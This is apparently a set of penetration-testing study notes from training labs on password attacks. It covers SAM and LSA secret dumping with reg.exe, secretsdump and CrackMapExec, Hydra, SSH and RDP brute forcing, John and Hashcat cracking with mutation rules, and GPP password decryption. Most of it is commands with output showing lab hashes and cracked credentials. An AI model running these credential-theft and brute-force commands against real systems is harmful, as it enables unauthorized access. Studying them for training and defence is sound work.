Brute Forcing/ Password Cracking

Hash Identifier

hash-identifier somehash
hashid hash1.txt

Online Hash Crackers

Default Credentials

base64 decoder

base64 -d encoded text

Windows Password Cracking

Dumping SAM files

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

The operation completed successfully.

Dumping Hashes with Impacket's secretsdump.py

One incredibly useful tool we can use to dump the hashes offline is Impacket's secretsdump.py. Impacket can be found on most modern penetration testing distributions. We can check for it by using locate on a Linux-based system:

Locating secretsdump.py

ammartiger@htb[/htb]$ locate secretsdump 

Using secretsdump.py is a simple process. All we must do is run secretsdump.py using Python, then specify each hive file we retrieved from the target host.

Running secretsdump.py

ammartiger@htb[/htb]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33:::
rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb1e1744d2dc4403f9fb0420d84c3299ba28f0643
dpapi_userkey:0x7995f82c5de363cc012ca6094d381671506fd362
[*] NL$KM 
 0000   D7 0A F4 B9 1E 3E 77 34  94 8F C4 7D AC 8F 60 69   .....>w4...}..`i
 0010   52 E1 2B 74 FF B2 08 5F  59 FE 32 19 D6 A7 2C F8   R.+t..._Y.2...,.
 0020   E2 A4 80 E0 0F 3D F8 48  44 98 87 E1 C9 CD 4B 28   .....=.HD.....K(
 0030   9B 7B 8B BF 3D 59 DB 90  D8 C7 AB 62 93 30 6A 42   .{..=Y.....b.0jB
NL$KM:d70af4b91e3e7734948fc47dac8f606952e12b74ffb2085f59fe3219d6a72cf8e2a480e00f3df848449887e1c9cd4b289b7b8bbf3d59db90d8c7ab6293306a42
[*] Cleaning up... 

Here we see that secretsdump successfully dumps the local SAM hashes and would've also dumped the cached domain logon information if the target was domain-joined and had cached credentials present in hklm\security. Notice the first step secretsdump executes is targeting the system bootkey before proceeding to dump the LOCAL SAM hashes. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database, which is why it is important for us to have copies of the registry hives we discussed earlier in this section. Notice at the top of the secretsdump.py output:

Dumping local SAM hashes (uid:rid:lmhash:nthash)

This tells us how to read the output and what hashes we can crack. Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS.

Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords. It may be beneficial to make a note of each user, so we know which password is associated with which user account.

Generating Word list with Crunch

crunch 3 3 0123456789ABCDEF -o 3digits.txt
  • 3 the first number is the minimum length of the generated password

  • 3 the second number is the maximum length of the generated password

  • 0123456789ABCDEF is the character set to use to generate the passwords

  • -o 3digits.txt saves the output to the 3digits.txt file

Hydra

Http brute force with Hydra

hydra -C tomcat-betterdefaultpasslist.txt -s 8080 10.10.10.95 http-get /manager/html

HTTP GET FORM

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.209.35 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid" -V -I -t 4

Hydra Post Form

hydra -l '' -P 3digits.txt -f -v MACHINE_IP http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
  • -l '' indicates that the login name is blank as the security lock only requires a password

  • -P 3digits.txt specifies the password file to use

  • -f stops Hydra after finding a working password

  • -v provides verbose output and is helpful for catching errors

  • MACHINE_IP is the IP address of the target

  • http-post-form specifies the HTTP method to use

  • "/login.php:pin=^PASS^:Access denied" has three parts separated by : /login.php is the page where the PIN code is submitted pin=^PASS^ will replace ^PASS^ with values from the password list Access denied indicates that invalid passwords will lead to a page that contains the text “Access denied”

  • -s 8000 indicates the port number on the target

Hydra SSH brute force

┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ hydra -L users -P passwords ssh://10.129.65.27
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-07 15:29:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21112 login tries (l:104/p:203), ~1320 tries per task
[DATA] attacking ssh://10.129.65.27:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 20936 to do in 01:58h, 16 active
[22][ssh] host: 10.129.65.27   login: dennis   password: rockstar

John the Ripper

SSH key

ssh2john key.pem >hash.txt

Simple Format to crack hashes

john --wordlist=[path to wordlist] [path to file]

To list supported hash types by John

john --list=formats

Cracking Hashes

john hash1.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-md5
john hash2.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-sha1
john hash3.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-sha256
john hash4.txt -w=/usr/share/wordlists/rockyou.txt --format=whirlpool
john ntlm.txt -w=/usr/share/wordlists/rockyou.txt --format=nt

Linux Password cracking

unshadow [path to passwd] [path to shadow]
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt

Single Crack Mode

John also has another mode, called Single Crack mode. In this mode, John uses only the information provided in the username, to try and work out possible passwords heuristically, by slightly changing the letters and numbers contained within the username. To use single crack mode, we use roughly the same syntax that we've used to so far, for example if we wanted to crack the password of the user named "Mike", using single mode, we'd use:

john --single --format=[format] [path to file]

If you're cracking hashes in single crack mode, you need to change the file format that you're feeding john for it to understand what data to create a wordlist from. You do this by prepending the hash with the username that the hash belongs to, so according to the above example- we would change the file hashes.txt

From:

1efee03cdcb96d90ad48ccc7b8666033

To

mike:1efee03cdcb96d90ad48ccc7b8666033

Zip Hash cracking

zip2john [options] [zip file] > [output file]
john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt

Rar Password Cracking

rar2john rarfile.rar > rar_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt rar_hash.txt

gpg Encryption

GnuPG or GPG is an Open Source implementation of PGP from the GNU project. You may need to use GPG to decrypt files in CTFs. With PGP/GPG, private keys can be protected with passphrases in a similar way to SSH private keys. If the key is passphrase protected, you can attempt to crack this passphrase using John The Ripper and gpg2john.

Import gpg key

gpg --import tryhackme.key

Decrypt Message

gpg --decrypt message.gpg 

Cracking groups.xml file (Windows server 2008)

Viewing the downloaded file, we get the username." userName="active.htb\SVC_TGS"

└─$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Now lets decrypt it with gpp-decrypt

                                                                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

Crackmapexec

Let's check if we have access through winrm.

┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.161 -u "svc-alfresco" -p "s3rvice"  
SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice 
┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ crackmapexec winrm 10.129.65.27 -u users -p passwords
SMB         10.129.65.27    5985   WINSRV           [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
HTTP        10.129.65.27    5985   WINSRV           [*] http://10.129.65.27:5985/wsman
WINRM       10.129.65.27    5985   WINSRV           [-] WINSRV\john:123456
WINRM       10.129.65.27    5985   WINSRV           [-] WINSRV\john:12345
WINRM       10.129.65.27    5985   WINSRV           [-] WINSRV\john:123456789
WINRM       10.129.65.27    5985   WINSRV           [-] WINSRV\john:batman
WINRM       10.129.65.27    5985   WINSRV           [-] WINSRV\john:password
WINRM       10.129.65.27    5985   WINSRV           [-] WINSRV\john:iloveyou
WINRM       10.129.65.27    5985   WINSRV           [-] WINSRV\john:princess
WINRM       10.129.65.27    5985   WINSRV           [+] WINSRV\john:november (Pwn3d!)

Evil-winrm

We can then use evil-winrm to connect to our target

┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ evilwinrm -i 10.129.65.27 -u john -p november
bash: evilwinrm: command not found
┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ evil-winrm -i 10.129.65.27 -u john -p november

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\john\Documents> 

SSH Bruteforcing CrackMapExec

┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ crackmapexec ssh 10.129.65.27 -u users -p passwords
SSH         10.129.65.27    22     10.129.65.27     [*] SSH-2.0-OpenSSH_for_Windows_7.7
SSH         10.129.65.27    22     10.129.65.27     [-] john:123456 Authentication failed.
SSH         10.129.65.27    22     10.129.65.27     [-] john:12345 Authentication failed.
SSH         10.129.65.27    22     10.129.65.27     [-] dennis:november Authentication failed.
SSH         10.129.65.27    22     10.129.65.27     [-] dennis:1234567 Authentication failed.
SSH         10.129.65.27    22     10.129.65.27     [-] dennis:12345678 Authentication failed.
SSH         10.129.65.27    22     10.129.65.27     [+] dennis:rockstar 

Listing Shares with crackmapexec

─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ crackmapexec smb 10.129.65.27 -u john -p november --shares
SMB         10.129.65.27    445    WINSRV           [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB         10.129.65.27    445    WINSRV           [+] WINSRV\john:november 
SMB         10.129.65.27    445    WINSRV           [+] Enumerated shares
SMB         10.129.65.27    445    WINSRV           Share           Permissions     Remark
SMB         10.129.65.27    445    WINSRV           -----           -----------     ------
SMB         10.129.65.27    445    WINSRV           ADMIN$                          Remote Admin
SMB         10.129.65.27    445    WINSRV           C$                              Default share
SMB         10.129.65.27    445    WINSRV           CASSIE                          
SMB         10.129.65.27    445    WINSRV           IPC$            READ            Remote IPC

We can then use smbclient to view the share

You can also use MSF to bruteforce SMB.

Password Mutations

Considering that many people want to keep their passwords as simple as possible despite password policies, we can create rules for generating weak passwords. Based on statistics provided by WPengine, most password lengths are not longer than ten characters. So what we can do is to pick specific terms that are at least five characters long and seem to be the most familiar to the users, such as the names of their pets, hobbies, preferences, and other interests. If the user chooses a single word (such as the current month), adds the current year, followed by a special character, at the end of their password, we would reach the ten-character password requirement. Considering that most companies require regular password changes, a user can modify their password by just changing the name of a month or a single number, etc. Let's use a simple example to create a password list with only one entry.

Password List

[!bash!]$ cat password.list

password

We can use a very powerful tool called Hashcat to combine lists of potential names and labels with specific mutation rules to create custom wordlists. To become more familiar with Hashcat and discover the full potential of this tool, we recommend the module Cracking Passwords with Hashcat. Hashcat uses a specific syntax for defining characters and words and how they can be modified. The complete list of this syntax can be found in the official documentation of Hashcat. However, the ones listed below are enough for us to understand how Hashcat mutates words.

Each rule is written on a new line which determines how the word should be mutated. If we write the functions shown above into a file and consider the aspects mentioned, this file can then look like this:

Hashcat Rule File

[!bash!]$ cat custom.rule

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

Hashcat will apply the rules of custom.rule for each word in password.list and store the mutated version in our mut_password.list accordingly. Thus, one word will result in fifteen mutated words in this case.

Generating Rule-based Wordlist

[!bash!]$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
[!bash!]$ cat mut_password.list

password
Password
passw0rd
Passw0rd
p@ssword
P@ssword
P@ssw0rd
password!
Password!
passw0rd!
p@ssword!
Passw0rd!
P@ssword!
p@ssw0rd!
P@ssw0rd!

Hashcat and John come with pre-built rule lists that we can use for our password generating and cracking purposes. One of the most used rules is best64.rule, which can often lead to good results. It is important to note that password cracking and the creation of custom wordlists is a guessing game in most cases. We can narrow this down and perform more targeted guessing if we have information about the password policy and take into account the company name, geographical region, industry, and other topics/words that users may select from to create their passwords. Exceptions are, of course, cases where passwords are leaked and found.

Hashcat Existing Rules

[!bash!]$ ls /usr/share/hashcat/rules/

best64.rule                  specific.rule
combinator.rule              T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
d3ad0ne.rule                 T0XlC-insert_space_and_special_0_F.rule
dive.rule                    T0XlC-insert_top_100_passwords_1_G.rule
generated2.rule              T0XlC.rule
generated.rule               T0XlCv1.rule
hybrid                       toggles1.rule
Incisive-leetspeak.rule      toggles2.rule
InsidePro-HashManager.rule   toggles3.rule
InsidePro-PasswordsPro.rule  toggles4.rule
leetspeak.rule               toggles5.rule
oscommerce.rule              unix-ninja-leetspeak.rule
rockyou-30000.rule

Generating wordlist from a website with CEWL

We can now use another tool called CeWL to scan potential words from the company's website and save them in a separate list. We can then combine this list with the desired rules and create a customized password list that has a higher probability of guessing a correct password. We specify some parameters, like the depth to spider (-d), the minimum length of the word (-m), the storage of the found words in lowercase (--lowercase), as well as the file where we want to store the results (-w).

Generating Wordlists Using CeWL

[!bash!]$ cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
[!bash!]$ wc -l inlane.wordlist

326

Crowbar - another tool for bruteforcing

Works best for RDP brute forcing

┌──(kali㉿kali)-[~/Desktop/Password-Attacks]
└─$ crowbar -b rdp -U username.list -C password.list -s 10.129.204.178/32
2024-04-08 05:37:01 START
2024-04-08 05:37:01 Crowbar v0.4.2
2024-04-08 05:37:01 Trying 10.129.204.178:3389





2024-04-08 05:42:21 RDP-SUCCESS : 10.129.204.178:3389 - chris:789456123

Xfreerdp

┌──(kali㉿kali)-[~/Desktop/Password-Attacks]
└─$ xfreerdp /v:10.129.32.51 /u:chris /p:789456123
[05:46:22:130] [67171:67172] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[05:46:22:130] [67171:67172] [WARN][com.freerdp.crypto] - CN = WINSRV
[05:46:27:555] [67171:67172] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[05:46:27:556] [67171:67172] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[05:46:27:629] [67171:67172] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[05:46:27:629] [67171:67172] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic V

Remote Dumping & LSA Secrets Considerations

With access to credentials with local admin privileges, it is also possible for us to target LSA Secrets over the network. This could allow us to extract credentials from a running service, scheduled task, or application that uses LSA secrets to store passwords.

ammartiger@htb[/htb]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

SMB         10.129.42.198   445    WS01     [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01     [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB         10.129.42.198   445    WS01     [+] Dumping LSA secrets
SMB         10.129.42.198   445    WS01     WS01\worker:Hello123
SMB         10.129.42.198   445    WS01      dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB         10.129.42.198   445    WS01     NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB         10.129.42.198   445    WS01     [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.secrets and /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cached

Dumping SAM Remotely

We can also dump hashes from the SAM database remotely.

ammartiger@htb[/htb]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

SMB         10.129.42.198   445    WS01      [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01      [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB         10.129.42.198   445    WS01      [+] Dumping SAM hashes
SMB         10.129.42.198   445    WS01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB         10.129.42.198   445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB         10.129.42.198   445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB         10.129.42.198   445    WS01     rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB         10.129.42.198   445    WS01     worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB         10.129.42.198   445    WS01     [+] Added 8 SAM hashes to the database

Password Cracking Cheatsheat

Connecting to Target


Password Mutations


Remote Password Attacks


Windows Local Password Attacks


Linux Local Password Attacks


Cracking Passwords

Last updated